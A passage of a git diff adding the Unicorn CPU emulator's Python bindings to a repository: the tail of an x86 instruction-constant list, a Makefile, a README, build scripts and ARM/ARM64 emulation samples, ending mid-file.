UC_X86_INS_VMOVDQA64 = 934; + UC_X86_INS_VMOVDQA = 935; + UC_X86_INS_VMOVDQU16 = 936; + UC_X86_INS_VMOVDQU32 = 937; + UC_X86_INS_VMOVDQU64 = 938; + UC_X86_INS_VMOVDQU8 = 939; + UC_X86_INS_VMOVDQU = 940; + UC_X86_INS_VMOVHLPS = 941; + UC_X86_INS_VMOVHPD = 942; + UC_X86_INS_VMOVHPS = 943; + UC_X86_INS_VMOVLHPS = 944; + UC_X86_INS_VMOVLPD = 945; + UC_X86_INS_VMOVLPS = 946; + UC_X86_INS_VMOVMSKPD = 947; + UC_X86_INS_VMOVMSKPS = 948; + UC_X86_INS_VMOVNTDQA = 949; + UC_X86_INS_VMOVNTDQ = 950; + UC_X86_INS_VMOVNTPD = 951; + UC_X86_INS_VMOVNTPS = 952; + UC_X86_INS_VMOVSD = 953; + UC_X86_INS_VMOVSHDUP = 954; + UC_X86_INS_VMOVSLDUP = 955; + UC_X86_INS_VMOVSS = 956; + UC_X86_INS_VMOVUPD = 957; + UC_X86_INS_VMOVUPS = 958; + UC_X86_INS_VMPSADBW = 959; + UC_X86_INS_VMPTRLD = 960; + UC_X86_INS_VMPTRST = 961; + UC_X86_INS_VMREAD = 962; + UC_X86_INS_VMRESUME = 963; + UC_X86_INS_VMRUN = 964; + UC_X86_INS_VMSAVE = 965; + UC_X86_INS_VMULPD = 966; + UC_X86_INS_VMULPS = 967; + UC_X86_INS_VMULSD = 968; + UC_X86_INS_VMULSS = 969; + UC_X86_INS_VMWRITE = 970; + UC_X86_INS_VMXOFF = 971; + UC_X86_INS_VMXON = 972; + UC_X86_INS_VPABSB = 973; + UC_X86_INS_VPABSD = 974; + UC_X86_INS_VPABSQ = 975; + UC_X86_INS_VPABSW = 976; + UC_X86_INS_VPACKSSDW = 977; + UC_X86_INS_VPACKSSWB = 978; + UC_X86_INS_VPACKUSDW = 979; + UC_X86_INS_VPACKUSWB = 980; + UC_X86_INS_VPADDB = 981; + UC_X86_INS_VPADDD = 982; + UC_X86_INS_VPADDQ = 983; + UC_X86_INS_VPADDSB = 984; + UC_X86_INS_VPADDSW = 985; + UC_X86_INS_VPADDUSB = 986; + UC_X86_INS_VPADDUSW = 987; + UC_X86_INS_VPADDW = 988; + UC_X86_INS_VPALIGNR = 989; + UC_X86_INS_VPANDD = 990; + UC_X86_INS_VPANDND = 991; + UC_X86_INS_VPANDNQ = 992; + UC_X86_INS_VPANDN = 993; + UC_X86_INS_VPANDQ = 994; + UC_X86_INS_VPAND = 995; + UC_X86_INS_VPAVGB = 996; + UC_X86_INS_VPAVGW = 997; + UC_X86_INS_VPBLENDD = 998; + UC_X86_INS_VPBLENDMB = 999; + UC_X86_INS_VPBLENDMD = 1000; + UC_X86_INS_VPBLENDMQ = 1001; + UC_X86_INS_VPBLENDMW = 1002; + UC_X86_INS_VPBLENDVB = 1003; + UC_X86_INS_VPBLENDW = 1004; + UC_X86_INS_VPBROADCASTB = 1005; + UC_X86_INS_VPBROADCASTD = 1006; + UC_X86_INS_VPBROADCASTMB2Q = 1007; + UC_X86_INS_VPBROADCASTMW2D = 1008; + UC_X86_INS_VPBROADCASTQ = 1009; + UC_X86_INS_VPBROADCASTW = 1010; + UC_X86_INS_VPCLMULQDQ = 1011; + UC_X86_INS_VPCMOV = 1012; + UC_X86_INS_VPCMPB = 1013; + UC_X86_INS_VPCMPD = 1014; + UC_X86_INS_VPCMPEQB = 1015; + UC_X86_INS_VPCMPEQD = 1016; + UC_X86_INS_VPCMPEQQ = 1017; + UC_X86_INS_VPCMPEQW = 1018; + UC_X86_INS_VPCMPESTRI = 1019; + UC_X86_INS_VPCMPESTRM = 1020; + UC_X86_INS_VPCMPGTB = 1021; + UC_X86_INS_VPCMPGTD = 1022; + UC_X86_INS_VPCMPGTQ = 1023; + UC_X86_INS_VPCMPGTW = 1024; + UC_X86_INS_VPCMPISTRI = 1025; + UC_X86_INS_VPCMPISTRM = 1026; + UC_X86_INS_VPCMPQ = 1027; + UC_X86_INS_VPCMPUB = 1028; + UC_X86_INS_VPCMPUD = 1029; + UC_X86_INS_VPCMPUQ = 1030; + UC_X86_INS_VPCMPUW = 1031; + UC_X86_INS_VPCMPW = 1032; + UC_X86_INS_VPCOMB = 1033; + UC_X86_INS_VPCOMD = 1034; + UC_X86_INS_VPCOMPRESSD = 1035; + UC_X86_INS_VPCOMPRESSQ = 1036; + UC_X86_INS_VPCOMQ = 1037; + UC_X86_INS_VPCOMUB = 1038; + UC_X86_INS_VPCOMUD = 1039; + UC_X86_INS_VPCOMUQ = 1040; + UC_X86_INS_VPCOMUW = 1041; + UC_X86_INS_VPCOMW = 1042; + UC_X86_INS_VPCONFLICTD = 1043; + UC_X86_INS_VPCONFLICTQ = 1044; + UC_X86_INS_VPERM2F128 = 1045; + UC_X86_INS_VPERM2I128 = 1046; + UC_X86_INS_VPERMD = 1047; + UC_X86_INS_VPERMI2D = 1048; + UC_X86_INS_VPERMI2PD = 1049; + UC_X86_INS_VPERMI2PS = 1050; + UC_X86_INS_VPERMI2Q = 1051; + UC_X86_INS_VPERMIL2PD = 1052; + UC_X86_INS_VPERMIL2PS = 1053; + UC_X86_INS_VPERMILPD = 1054; + UC_X86_INS_VPERMILPS = 1055; + UC_X86_INS_VPERMPD = 1056; + UC_X86_INS_VPERMPS = 1057; + UC_X86_INS_VPERMQ = 1058; + UC_X86_INS_VPERMT2D = 1059; + UC_X86_INS_VPERMT2PD = 1060; + UC_X86_INS_VPERMT2PS = 1061; + UC_X86_INS_VPERMT2Q = 1062; + UC_X86_INS_VPEXPANDD = 1063; + UC_X86_INS_VPEXPANDQ = 1064; + UC_X86_INS_VPEXTRB = 1065; + UC_X86_INS_VPEXTRD = 1066; + UC_X86_INS_VPEXTRQ = 1067; + UC_X86_INS_VPEXTRW = 1068; + UC_X86_INS_VPGATHERDD = 1069; + UC_X86_INS_VPGATHERDQ = 1070; + UC_X86_INS_VPGATHERQD = 1071; + UC_X86_INS_VPGATHERQQ = 1072; + UC_X86_INS_VPHADDBD = 1073; + UC_X86_INS_VPHADDBQ = 1074; + UC_X86_INS_VPHADDBW = 1075; + UC_X86_INS_VPHADDDQ = 1076; + UC_X86_INS_VPHADDD = 1077; + UC_X86_INS_VPHADDSW = 1078; + UC_X86_INS_VPHADDUBD = 1079; + UC_X86_INS_VPHADDUBQ = 1080; + UC_X86_INS_VPHADDUBW = 1081; + UC_X86_INS_VPHADDUDQ = 1082; + UC_X86_INS_VPHADDUWD = 1083; + UC_X86_INS_VPHADDUWQ = 1084; + UC_X86_INS_VPHADDWD = 1085; + UC_X86_INS_VPHADDWQ = 1086; + UC_X86_INS_VPHADDW = 1087; + UC_X86_INS_VPHMINPOSUW = 1088; + UC_X86_INS_VPHSUBBW = 1089; + UC_X86_INS_VPHSUBDQ = 1090; + UC_X86_INS_VPHSUBD = 1091; + UC_X86_INS_VPHSUBSW = 1092; + UC_X86_INS_VPHSUBWD = 1093; + UC_X86_INS_VPHSUBW = 1094; + UC_X86_INS_VPINSRB = 1095; + UC_X86_INS_VPINSRD = 1096; + UC_X86_INS_VPINSRQ = 1097; + UC_X86_INS_VPINSRW = 1098; + UC_X86_INS_VPLZCNTD = 1099; + UC_X86_INS_VPLZCNTQ = 1100; + UC_X86_INS_VPMACSDD = 1101; + UC_X86_INS_VPMACSDQH = 1102; + UC_X86_INS_VPMACSDQL = 1103; + UC_X86_INS_VPMACSSDD = 1104; + UC_X86_INS_VPMACSSDQH = 1105; + UC_X86_INS_VPMACSSDQL = 1106; + UC_X86_INS_VPMACSSWD = 1107; + UC_X86_INS_VPMACSSWW = 1108; + UC_X86_INS_VPMACSWD = 1109; + UC_X86_INS_VPMACSWW = 1110; + UC_X86_INS_VPMADCSSWD = 1111; + UC_X86_INS_VPMADCSWD = 1112; + UC_X86_INS_VPMADDUBSW = 1113; + UC_X86_INS_VPMADDWD = 1114; + UC_X86_INS_VPMASKMOVD = 1115; + UC_X86_INS_VPMASKMOVQ = 1116; + UC_X86_INS_VPMAXSB = 1117; + UC_X86_INS_VPMAXSD = 1118; + UC_X86_INS_VPMAXSQ = 1119; + UC_X86_INS_VPMAXSW = 1120; + UC_X86_INS_VPMAXUB = 1121; + UC_X86_INS_VPMAXUD = 1122; + UC_X86_INS_VPMAXUQ = 1123; + UC_X86_INS_VPMAXUW = 1124; + UC_X86_INS_VPMINSB = 1125; + UC_X86_INS_VPMINSD = 1126; + UC_X86_INS_VPMINSQ = 1127; + UC_X86_INS_VPMINSW = 1128; + UC_X86_INS_VPMINUB = 1129; + UC_X86_INS_VPMINUD = 1130; + UC_X86_INS_VPMINUQ = 1131; + UC_X86_INS_VPMINUW = 1132; + UC_X86_INS_VPMOVDB = 1133; + UC_X86_INS_VPMOVDW = 1134; + UC_X86_INS_VPMOVM2B = 1135; + UC_X86_INS_VPMOVM2D = 1136; + UC_X86_INS_VPMOVM2Q = 1137; + UC_X86_INS_VPMOVM2W = 1138; + UC_X86_INS_VPMOVMSKB = 1139; + UC_X86_INS_VPMOVQB = 1140; + UC_X86_INS_VPMOVQD = 1141; + UC_X86_INS_VPMOVQW = 1142; + UC_X86_INS_VPMOVSDB = 1143; + UC_X86_INS_VPMOVSDW = 1144; + UC_X86_INS_VPMOVSQB = 1145; + UC_X86_INS_VPMOVSQD = 1146; + UC_X86_INS_VPMOVSQW = 1147; + UC_X86_INS_VPMOVSXBD = 1148; + UC_X86_INS_VPMOVSXBQ = 1149; + UC_X86_INS_VPMOVSXBW = 1150; + UC_X86_INS_VPMOVSXDQ = 1151; + UC_X86_INS_VPMOVSXWD = 1152; + UC_X86_INS_VPMOVSXWQ = 1153; + UC_X86_INS_VPMOVUSDB = 1154; + UC_X86_INS_VPMOVUSDW = 1155; + UC_X86_INS_VPMOVUSQB = 1156; + UC_X86_INS_VPMOVUSQD = 1157; + UC_X86_INS_VPMOVUSQW = 1158; + UC_X86_INS_VPMOVZXBD = 1159; + UC_X86_INS_VPMOVZXBQ = 1160; + UC_X86_INS_VPMOVZXBW = 1161; + UC_X86_INS_VPMOVZXDQ = 1162; + UC_X86_INS_VPMOVZXWD = 1163; + UC_X86_INS_VPMOVZXWQ = 1164; + UC_X86_INS_VPMULDQ = 1165; + UC_X86_INS_VPMULHRSW = 1166; + UC_X86_INS_VPMULHUW = 1167; + UC_X86_INS_VPMULHW = 1168; + UC_X86_INS_VPMULLD = 1169; + UC_X86_INS_VPMULLQ = 1170; + UC_X86_INS_VPMULLW = 1171; + UC_X86_INS_VPMULUDQ = 1172; + UC_X86_INS_VPORD = 1173; + UC_X86_INS_VPORQ = 1174; + UC_X86_INS_VPOR = 1175; + UC_X86_INS_VPPERM = 1176; + UC_X86_INS_VPROTB = 1177; + UC_X86_INS_VPROTD = 1178; + UC_X86_INS_VPROTQ = 1179; + UC_X86_INS_VPROTW = 1180; + UC_X86_INS_VPSADBW = 1181; + UC_X86_INS_VPSCATTERDD = 1182; + UC_X86_INS_VPSCATTERDQ = 1183; + UC_X86_INS_VPSCATTERQD = 1184; + UC_X86_INS_VPSCATTERQQ = 1185; + UC_X86_INS_VPSHAB = 1186; + UC_X86_INS_VPSHAD = 1187; + UC_X86_INS_VPSHAQ = 1188; + UC_X86_INS_VPSHAW = 1189; + UC_X86_INS_VPSHLB = 1190; + UC_X86_INS_VPSHLD = 1191; + UC_X86_INS_VPSHLQ = 1192; + UC_X86_INS_VPSHLW = 1193; + UC_X86_INS_VPSHUFB = 1194; + UC_X86_INS_VPSHUFD = 1195; + UC_X86_INS_VPSHUFHW = 1196; + UC_X86_INS_VPSHUFLW = 1197; + UC_X86_INS_VPSIGNB = 1198; + UC_X86_INS_VPSIGND = 1199; + UC_X86_INS_VPSIGNW = 1200; + UC_X86_INS_VPSLLDQ = 1201; + UC_X86_INS_VPSLLD = 1202; + UC_X86_INS_VPSLLQ = 1203; + UC_X86_INS_VPSLLVD = 1204; + UC_X86_INS_VPSLLVQ = 1205; + UC_X86_INS_VPSLLW = 1206; + UC_X86_INS_VPSRAD = 1207; + UC_X86_INS_VPSRAQ = 1208; + UC_X86_INS_VPSRAVD = 1209; + UC_X86_INS_VPSRAVQ = 1210; + UC_X86_INS_VPSRAW = 1211; + UC_X86_INS_VPSRLDQ = 1212; + UC_X86_INS_VPSRLD = 1213; + UC_X86_INS_VPSRLQ = 1214; + UC_X86_INS_VPSRLVD = 1215; + UC_X86_INS_VPSRLVQ = 1216; + UC_X86_INS_VPSRLW = 1217; + UC_X86_INS_VPSUBB = 1218; + UC_X86_INS_VPSUBD = 1219; + UC_X86_INS_VPSUBQ = 1220; + UC_X86_INS_VPSUBSB = 1221; + UC_X86_INS_VPSUBSW = 1222; + UC_X86_INS_VPSUBUSB = 1223; + UC_X86_INS_VPSUBUSW = 1224; + UC_X86_INS_VPSUBW = 1225; + UC_X86_INS_VPTESTMD = 1226; + UC_X86_INS_VPTESTMQ = 1227; + UC_X86_INS_VPTESTNMD = 1228; + UC_X86_INS_VPTESTNMQ = 1229; + UC_X86_INS_VPTEST = 1230; + UC_X86_INS_VPUNPCKHBW = 1231; + UC_X86_INS_VPUNPCKHDQ = 1232; + UC_X86_INS_VPUNPCKHQDQ = 1233; + UC_X86_INS_VPUNPCKHWD = 1234; + UC_X86_INS_VPUNPCKLBW = 1235; + UC_X86_INS_VPUNPCKLDQ = 1236; + UC_X86_INS_VPUNPCKLQDQ = 1237; + UC_X86_INS_VPUNPCKLWD = 1238; + UC_X86_INS_VPXORD = 1239; + UC_X86_INS_VPXORQ = 1240; + UC_X86_INS_VPXOR = 1241; + UC_X86_INS_VRCP14PD = 1242; + UC_X86_INS_VRCP14PS = 1243; + UC_X86_INS_VRCP14SD = 1244; + UC_X86_INS_VRCP14SS = 1245; + UC_X86_INS_VRCP28PD = 1246; + UC_X86_INS_VRCP28PS = 1247; + UC_X86_INS_VRCP28SD = 1248; + UC_X86_INS_VRCP28SS = 1249; + UC_X86_INS_VRCPPS = 1250; + UC_X86_INS_VRCPSS = 1251; + UC_X86_INS_VRNDSCALEPD = 1252; + UC_X86_INS_VRNDSCALEPS = 1253; + UC_X86_INS_VRNDSCALESD = 1254; + UC_X86_INS_VRNDSCALESS = 1255; + UC_X86_INS_VROUNDPD = 1256; + UC_X86_INS_VROUNDPS = 1257; + UC_X86_INS_VROUNDSD = 1258; + UC_X86_INS_VROUNDSS = 1259; + UC_X86_INS_VRSQRT14PD = 1260; + UC_X86_INS_VRSQRT14PS = 1261; + UC_X86_INS_VRSQRT14SD = 1262; + UC_X86_INS_VRSQRT14SS = 1263; + UC_X86_INS_VRSQRT28PD = 1264; + UC_X86_INS_VRSQRT28PS = 1265; + UC_X86_INS_VRSQRT28SD = 1266; + UC_X86_INS_VRSQRT28SS = 1267; + UC_X86_INS_VRSQRTPS = 1268; + UC_X86_INS_VRSQRTSS = 1269; + UC_X86_INS_VSCATTERDPD = 1270; + UC_X86_INS_VSCATTERDPS = 1271; + UC_X86_INS_VSCATTERPF0DPD = 1272; + UC_X86_INS_VSCATTERPF0DPS = 1273; + UC_X86_INS_VSCATTERPF0QPD = 1274; + UC_X86_INS_VSCATTERPF0QPS = 1275; + UC_X86_INS_VSCATTERPF1DPD = 1276; + UC_X86_INS_VSCATTERPF1DPS = 1277; + UC_X86_INS_VSCATTERPF1QPD = 1278; + UC_X86_INS_VSCATTERPF1QPS = 1279; + UC_X86_INS_VSCATTERQPD = 1280; + UC_X86_INS_VSCATTERQPS = 1281; + UC_X86_INS_VSHUFPD = 1282; + UC_X86_INS_VSHUFPS = 1283; + UC_X86_INS_VSQRTPD = 1284; + UC_X86_INS_VSQRTPS = 1285; + UC_X86_INS_VSQRTSD = 1286; + UC_X86_INS_VSQRTSS = 1287; + UC_X86_INS_VSTMXCSR = 1288; + UC_X86_INS_VSUBPD = 1289; + UC_X86_INS_VSUBPS = 1290; + UC_X86_INS_VSUBSD = 1291; + UC_X86_INS_VSUBSS = 1292; + UC_X86_INS_VTESTPD = 1293; + UC_X86_INS_VTESTPS = 1294; + UC_X86_INS_VUNPCKHPD = 1295; + UC_X86_INS_VUNPCKHPS = 1296; + UC_X86_INS_VUNPCKLPD = 1297; + UC_X86_INS_VUNPCKLPS = 1298; + UC_X86_INS_VZEROALL = 1299; + UC_X86_INS_VZEROUPPER = 1300; + UC_X86_INS_WAIT = 1301; + UC_X86_INS_WBINVD = 1302; + UC_X86_INS_WRFSBASE = 1303; + UC_X86_INS_WRGSBASE = 1304; + UC_X86_INS_WRMSR = 1305; + UC_X86_INS_XABORT = 1306; + UC_X86_INS_XACQUIRE = 1307; + UC_X86_INS_XBEGIN = 1308; + UC_X86_INS_XCHG = 1309; + UC_X86_INS_XCRYPTCBC = 1310; + UC_X86_INS_XCRYPTCFB = 1311; + UC_X86_INS_XCRYPTCTR = 1312; + UC_X86_INS_XCRYPTECB = 1313; + UC_X86_INS_XCRYPTOFB = 1314; + UC_X86_INS_XEND = 1315; + UC_X86_INS_XGETBV = 1316; + UC_X86_INS_XLATB = 1317; + UC_X86_INS_XRELEASE = 1318; + UC_X86_INS_XRSTOR = 1319; + UC_X86_INS_XRSTOR64 = 1320; + UC_X86_INS_XRSTORS = 1321; + UC_X86_INS_XRSTORS64 = 1322; + UC_X86_INS_XSAVE = 1323; + UC_X86_INS_XSAVE64 = 1324; + UC_X86_INS_XSAVEC = 1325; + UC_X86_INS_XSAVEC64 = 1326; + UC_X86_INS_XSAVEOPT = 1327; + UC_X86_INS_XSAVEOPT64 = 1328; + UC_X86_INS_XSAVES = 1329; + UC_X86_INS_XSAVES64 = 1330; + UC_X86_INS_XSETBV = 1331; + UC_X86_INS_XSHA1 = 1332; + UC_X86_INS_XSHA256 = 1333; + UC_X86_INS_XSTORE = 1334; + UC_X86_INS_XTEST = 1335; + UC_X86_INS_FDISI8087_NOP = 1336; + UC_X86_INS_FENI8087_NOP = 1337; + UC_X86_INS_ENDING = 1338; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/MANIFEST.in b/ai_anti_malware/unicorn/unicorn-master/bindings/python/MANIFEST.in new file mode 100644 index 0000000..a98ea52 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/MANIFEST.in @@ -0,0 +1,4 @@ +recursive-include src * +recursive-include prebuilt * +include LICENSE.TXT +include README.TXT diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/python/Makefile new file mode 100644 index 0000000..ea831fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/Makefile @@ -0,0 +1,84 @@ +# Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com> + +.PHONY: gen_const install install3 clean sdist sdist3 bdist bdist3 sdist_win bdist_win + +gen_const: + cd .. && python const_generator.py python + +install: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + if test -n "${DESTDIR}"; then \ + python setup.py install --root="${DESTDIR}"; \ + else \ + python setup.py install; \ + fi + +install3: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + if test -n "${DESTDIR}"; then \ + python3 setup.py install --root="${DESTDIR}"; \ + else \ + python3 setup.py install; \ + fi + +# build & upload PyPi package with source code of the core +sdist: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python setup.py sdist register upload + +# build & upload PyPi package with source code of the core +sdist3: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python3 setup.py sdist register upload + +# build & upload PyPi package with precompiled core +bdist: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python setup.py bdist_wheel register upload + +# build & upload PyPi package with precompiled core +bdist3: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python3 setup.py bdist_wheel register upload + +# build & upload PyPi package with prebuilt core +# NOTE: be sure to have precompiled core under prebuilt/win*/ beforehand +sdist_win: + rm -rf src/ dist/ + python setup.py sdist register upload + +# build & upload PyPi package with prebuilt core +# NOTE: be sure to have precompiled core under prebuilt/win*/ beforehand +sdist3_win: + rm -rf src/ dist/ + python3 setup.py sdist register upload + +clean: + rm -rf src/ dist/ build/ MANIFEST + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + rm -rf unicorn/lib unicorn/include + rm -rf unicorn/*.pyc + rm -rf unicorn.egg-info + + +SAMPLES = sample_arm.py sample_arm64.py sample_mips.py +SAMPLES += sample_sparc.py sample_m68k.py sample_x86.py +check: + @for t in $(SAMPLES); do \ + echo Check $$t ... ; \ + ./$$t > /dev/null && echo OK || echo FAILED; \ + done + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/README.TXT b/ai_anti_malware/unicorn/unicorn-master/bindings/python/README.TXT new file mode 100644 index 0000000..ab5747a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/README.TXT @@ -0,0 +1,41 @@ +This documentation explains how to install the python binding for Unicorn +from source. + +1. Installing on Linux: + + $ sudo python setup.py install + + This will build the core C library, package it with the python bindings, + and install it to your system. + + If you want to prevent the build of the native library during the python installation, + set the environment variable LIBUNICORN_PATH. You may also set this to a directory + containing libunicorn.so if you wish to use a verison of the native library other than + the globally installed one. + + +2. Installing on Windows: + + Run the following command in command prompt: + + C:\> C:\location_to_python\python.exe setup.py install + + Next, copy all the DLL files from the 'Core engine for Windows' package available + on the Unicorn download page and paste it in the path: + + C:\location_to_python\Lib\site-packages\unicorn\ + + +3. Sample code + + This directory contains some sample code to show how to use Unicorn API. + + - sample_<arch>.py + These code show how to access architecture-specific information for each + architecture. + + - shellcode.py + This shows how to analyze a Linux shellcode. + + - sample_network_auditing.py + This shows how to analyze & interpret Linux shellcode. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/build_wheel.sh b/ai_anti_malware/unicorn/unicorn-master/bindings/python/build_wheel.sh new file mode 100644 index 0000000..e3c9d44 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/build_wheel.sh @@ -0,0 +1,14 @@ +#!/bin/bash +set -e -x + +cd bindings/python + +# Compile wheels +if [ -f /opt/python/cp36-cp36m/bin/python ];then + /opt/python/cp36-cp36m/bin/python setup.py bdist_wheel +else + python3 setup.py bdist_wheel +fi +cd dist +auditwheel repair *.whl +mv -f wheelhouse/*.whl . diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/prebuilt/.gitkeep b/ai_anti_malware/unicorn/unicorn-master/bindings/python/prebuilt/.gitkeep new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_all.sh b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_all.sh new file mode 100644 index 0000000..f4e7a55 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_all.sh @@ -0,0 +1,15 @@ +#!/bin/sh + +./sample_x86.py +echo "==========================" +./shellcode.py +echo "==========================" +./sample_arm.py +echo "==========================" +./sample_arm64.py +echo "==========================" +./sample_mips.py +echo "==========================" +./sample_sparc.py +echo "==========================" +./sample_m68k.py diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm.py new file mode 100644 index 0000000..5fae6b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python +# Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + + +# code to be emulated +ARM_CODE = b"\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = b"\x83\xb0" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM +def test_arm(): + print("Emulate ARM code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF) #All application flags turned on + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing one instruction at ADDRESS with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + print(">>> R0 = 0x%x" %r0) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_thumb(): + print("Emulate THUMB code") + try: + # Initialize emulator in thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + # Note we start at ADDRESS | 1 to indicate THUMB mode. + mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm() + print("=" * 26) + test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64.py new file mode 100644 index 0000000..0f9550b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm64_const import * + + +# code to be emulated +ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38" # str x11, [x13]; ldrb x15, [x13] + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM64 +def test_arm64(): + print("Emulate ARM64 code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM64_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM64_REG_X11, 0x12345678) + mu.reg_write(UC_ARM64_REG_X13, 0x10008) + mu.reg_write(UC_ARM64_REG_X15, 0x33) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing one instruction at ADDRESS with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + print(">>> As little endian, X15 should be 0x78:") + + x11 = mu.reg_read(UC_ARM64_REG_X11) + x13 = mu.reg_read(UC_ARM64_REG_X13) + x15 = mu.reg_read(UC_ARM64_REG_X15) + print(">>> X15 = 0x%x" %x15) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm64() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64eb.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64eb.py new file mode 100644 index 0000000..4d96f46 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64eb.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python +# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> +# AARCH64 Python sample ported by zhangwm <rustydaar@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm64_const import * + + +# code to be emulated +ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38" # str x11, [x13]; ldrb x15, [x13] + +# memory address where emulation starts +ADDRESS = 